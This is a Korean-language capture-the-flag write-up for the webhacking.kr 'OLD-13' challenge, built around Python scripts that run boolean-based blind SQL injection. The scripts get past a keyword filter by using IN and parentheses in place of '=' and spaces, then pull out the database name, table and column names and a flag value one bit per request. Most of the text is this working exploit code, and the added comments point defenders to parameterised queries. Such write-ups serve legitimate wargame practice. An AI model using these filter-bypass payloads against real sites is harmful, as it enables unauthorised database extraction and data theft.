#️⃣

OLD-13

때려박으란다
필터링 : | = %20 like group * 0x char WHERE
0 넣어보자 → 아무 일도 안생김
1 넣어보면 결과가 나오긴 한다. 이걸 참값으로 하고, 나머지를 거짓 값으로 해서 쿼리를 날려야겠다.
이제 DB 길이를 찾아야 하는데, = like 가 필터링 당하니까, in 을 활용했다.
def length_finder(search_max: int):
    """Probe the length of ``database()`` one candidate value at a time.

    Boolean-based blind SQL injection: for each candidate ``i`` the ``no``
    parameter becomes ``(0)or((length(database()))in(i))`` and the page is
    classified by which of the module-level marker fragments ``true`` /
    ``false`` (plain ``str`` names, not the builtins) appears in the HTML.
    ``in(...)`` is used in place of ``=``, which the challenge filters (see
    the writeup above).  Relies on the module-level ``URL`` and ``cookie``.

    Returns the first matching length, or ``None`` when no candidate below
    ``search_max`` matched or the loop only hit the ``filtered``/fallback
    branches -- the caller must handle that.

    Defender's note: this sends one request per candidate with a monotonically
    increasing integer in an otherwise identical URL, a pattern that stands
    out in access logs; the fix for the underlying flaw is a parameterised
    query, not a longer keyword blacklist.
    """
    for i in range(1,search_max):
        print("LOOKING FOR LENGTH : "+str(i)) #find db name length
        pay = "?no=(0)or((length(database()))in("+str(i)+"))"
        res = requests.get(url=URL+pay,cookies=cookie)
        if true in res.text:
            # A "1" result row: the injected predicate evaluated true.
            print("PASSWORD LENGTH : "+str(i))
            return i
        elif false in res.text:
            print("--> false")
            continue
        elif "hack" in res.text:
            # The author treats a response containing "hack" as the filter
            # having fired; the loop simply moves on to the next candidate.
            print("filtered")
        else:
            print(res.text)
이제 값을 찾아주면
def word_finder(length: int) -> None:
    """Recover ``database()`` character by character, one bit per request.

    For character position ``i`` (1-based, ``length`` of them) the payload
    takes ``ord(substr(database(), i, 1))``, renders it with ``bin()``,
    left-pads to 8 digits with ``lpad(..., 8, 0)`` and tests whether digit
    ``j`` is ``1`` via ``substr(..., j, 1) in (1)``.  Eight requests (``j`` in
    1..8) therefore yield one character, assembled from the collected bits
    with ``chr(int("0b" + word, 2))``.  Uses the module-level ``URL``,
    ``cookie`` and the ``true``/``false`` marker strings (plain ``str``
    names, not the builtins).

    Any response carrying neither marker aborts the whole run via ``exit()``.
    Output is printed only; nothing is returned.

    Defender's note: 8 near-identical requests per character, differing only
    in two small integers, is the signature of bit-wise blind extraction --
    rate limiting and log review catch it, parameterised queries prevent it.
    """
    flag = ""
    for i in range(1,length+1):
        word = ""
        print("FINDING PW of : "+str(i))
        for j in range(1,9):
            print("SEARCHING for "+str(j),end="\r")
            pay = "?no=(0)or((substr(lpad(bin(ord(substr(database(),"+str(i)+",1))),8,0),"+str(j)+",1))in(1))"
            res = requests.get(url=URL+pay,cookies=cookie)
            if true in res.text:
                word += "1"
                continue
            elif false in res.text:
                word += "0"
                continue
            else:
                # Neither oracle marker present: unknown page state, stop.
                print("\nSOMETHING's WRONG")
                print("\n",res.text)
                exit()
        # Bits were collected most-significant first (lpad to 8 digits).
        print("\n","word : "+chr(int("0b"+word,2)))
        flag += chr(int("0b"+word,2))
    # NOTE(review): the original paste lost indentation; this final print is
    # placed after the loop, but it may have been inside it (per-character
    # progress).  Either placement only affects console output.
    print("\n",flag)
이 정도면 양식이 정해져 있는 것 같은 모습이다.
근데 공백 못쓰니까 쿼리가 너무 복잡해져서 실수가 많이 나온다.
def length_finder(search_max: int) -> int:
    """Probe the length of the first table name in the current database.

    Same boolean oracle as the earlier version, but the probed expression is
    now ``LENGTH((SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN(DATABASE())),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES)))``
    -- presumably the alphabetically smallest ``TABLE_NAME`` whose schema is
    the current database -- compared with ``IN(i)`` because ``=`` and ``like``
    are filtered.  Note the search starts at 10, not 1.  Uses the module-level
    ``URL``, ``cookie`` and ``true``/``false`` marker strings.

    Returns the matching length.  Unlike the first version this never returns
    ``None``: an unrecognised response, or exhausting ``search_max``, ends the
    process via ``exit()``.
    """
    for i in range(10,search_max):
        print("LOOKING FOR LENGTH : "+str(i)) #find db name length
        pay = "?no=LENGTH((SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN(DATABASE())),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES)))IN("+str(i)+")"
        res = requests.get(url=URL+pay,cookies=cookie)
        if true in res.text:
            print("PASSWORD LENGTH : "+str(i))
            return i
        elif false in res.text:
            print("--> false")
            continue
        elif "hack" in res.text:
            # The author treats a response containing "hack" as the filter
            # having fired; the next candidate is tried anyway.
            print("filtered")
        else:
            # Neither oracle marker present: unknown page state, stop.
            print(res.text)
            exit()
    print("LENGTH NOT FOUND")
    exit()


def word_finder(length: int) -> None:
    """Recover the first table name character by character, one bit per request.

    Identical extraction scheme to the earlier ``word_finder``: ``ord`` of the
    ``i``-th character, ``bin`` + ``lpad(..., 8, 0)`` to 8 digits, and
    ``substr(..., j, 1) in (1)`` tested for ``j`` in 1..8, so each character
    costs 8 requests.  The subject string is the same ``INFORMATION_SCHEMA``
    subquery used by ``length_finder`` above.  Uses the module-level ``URL``,
    ``cookie`` and ``true``/``false`` marker strings.

    Prints progress and the accumulated string; returns nothing.  An
    unrecognised response aborts via ``exit()``.
    """
    flag = ""
    for i in range(1,length+1):
        word = ""
        print("FINDING PW of : "+str(i))
        for j in range(1,9):
            print("SEARCHING for "+str(j),end="\r")
            pay = "?no=(0)or((substr(lpad(bin(ord(substr((SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN(DATABASE())),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES)),"+str(i)+",1))),8,0),"+str(j)+",1))in(1))"
            res = requests.get(url=URL+pay,cookies=cookie)
            if true in res.text:
                word += "1"
                continue
            elif false in res.text:
                word += "0"
                continue
            else:
                print("\nSOMETHING's WRONG")
                print("\n",res.text)
                exit()
        # Bits were collected most-significant first (lpad to 8 digits).
        print("\n","word : "+chr(int("0b"+word,2)))
        flag += chr(int("0b"+word,2))
    # NOTE(review): indentation was lost in the paste; this print is placed
    # after the loop but may have been per-character.  Output only.
    print("\n","STRING VALUE : "+flag)
암튼 설명은 여기까지. 나머지는 똑같은 것의 반복이다.
전체 자동화 코드 넣어놨다.
import requests
import os

# Console housekeeping only: "cls" is the Windows clear-screen command, so on
# other platforms this just prints a shell error.
os.system("cls")
print("------------AUTO EXPLOIT------------")

# Target challenge and the session cookie it requires (value redacted by the
# author).  NOTE(review): the cookie is a credential -- loading it from the
# environment rather than the source keeps it out of pasted writeups.
URL = "https://webhacking.kr/challenge/web-10/"
cookie = {"PHPSESSID": "<--REDACTED-->"}

# HTML fragments marking a "1" and a "0" result row; they are the oracle for
# the boolean-based blind injection.  These are plain str names, not the
# builtins True/False -- easy to misread.
true = "result</td></tr><tr><td>1</td>"
false = "result</td></tr><tr><td>0</td>"

# SQL expressions, written without spaces because %20 is filtered, that each
# evaluate to a single string.  Each stage nests the previous one:
# database name -> first table -> first column -> stored value.
DBNAME_query = "database()"
# MIN() over IF(schema is the current DB, table name, NULL): presumably the
# alphabetically first table in the current database.
TABLENAME_query = "(SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN("+DBNAME_query+")),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES))"
COLUMNNAME_query = "(SELECT(MIN(IF((SELECT(TABLE_NAME)IN("+TABLENAME_query+")),COLUMN_NAME,NULL)))FROM(INFORMATION_SCHEMA.COLUMNS))"
# Table and column names found by the two stages above, hard-coded here.
DATA_query = "(SELECT(MIN(flag_3a55b31d))FROM(flag_ab733768))"


def length_finder(search_max: int, query: str) -> int:
    """Probe ``LENGTH(query)`` with one request per candidate value.

    ``query`` is one of the SQL expressions above; the ``no`` parameter
    becomes ``LENGTH(query)IN(i)`` (``IN`` instead of the filtered ``=``) and
    the response is classified by the ``true``/``false`` marker fragments.

    Returns the first matching length in ``1..search_max-1``.  An
    unrecognised response, or no match at all, ends the process via
    ``exit()``, so ``None`` is never returned.

    Defender's note: identical URLs differing only in an increasing integer
    are an easy access-log signature; the underlying fix is a parameterised
    query rather than keyword filtering.
    """
    for i in range(1,search_max):
        print("LOOKING FOR LENGTH : "+str(i)) #find db name length
        pay = "?no=LENGTH("+query+")IN("+str(i)+")"
        res = requests.get(url=URL+pay,cookies=cookie)
        if true in res.text:
            print("PASSWORD LENGTH : "+str(i))
            return i
        elif false in res.text:
            print("--> false")
            continue
        elif "hack" in res.text:
            # The author treats a response containing "hack" as the filter
            # having fired; the next candidate is tried anyway.
            print("filtered")
        else:
            # Neither oracle marker present: unknown page state, stop.
            print(res.text)
            exit()
    print("LENGTH NOT FOUND")
    exit()


def word_finder(length: int, query: str) -> None:
    """Recover the string ``query`` evaluates to, one bit per request.

    For character ``i`` in ``1..length`` the payload takes
    ``ord(substr(query, i, 1))``, renders it with ``bin``, left-pads to 8
    digits with ``lpad(..., 8, 0)`` and tests digit ``j`` via
    ``substr(..., j, 1) in (1)`` for ``j`` in 1..8 -- eight requests per
    character, reassembled with ``chr(int("0b" + word, 2))``.

    Prints progress and the accumulated string; returns nothing.  A response
    carrying neither oracle marker aborts via ``exit()``.

    Defender's note: bursts of 8 near-identical requests differing in two
    small integers are the signature of bit-wise blind extraction; rate
    limiting and log review detect it, parameterised queries prevent it.
    """
    flag = ""
    for i in range(1,length+1):
        word = ""
        print("FINDING PW of : "+str(i))
        for j in range(1,9):
            print("SEARCHING for "+str(j),end="\r")
            pay = "?no=(0)or((substr(lpad(bin(ord(substr("+query+","+str(i)+",1))),8,0),"+str(j)+",1))in(1))"
            res = requests.get(url=URL+pay,cookies=cookie)
            if true in res.text:
                word += "1"
                continue
            elif false in res.text:
                word += "0"
                continue
            else:
                print("\nSOMETHING's WRONG")
                print("\n",res.text)
                exit()
        # Bits were collected most-significant first (lpad to 8 digits).
        print("\n","word : "+chr(int("0b"+word,2)))
        flag += chr(int("0b"+word,2))
    # NOTE(review): indentation was lost in the paste; this print is placed
    # after the loop but may have been per-character.  Output only.
    print("\n","STRING VALUE : "+flag)


if __name__ == "__main__":
    # Earlier enumeration stages, kept commented out once their results were
    # folded into DATA_query above.
    #word_finder(length_finder(20,DBNAME_query),DBNAME_query)
    #word_finder(length_finder(20,TABLENAME_query),TABLENAME_query)
    #word_finder(length_finder(20,COLUMNNAME_query),COLUMNNAME_query)
    word_finder(length_finder(30,DATA_query),DATA_query)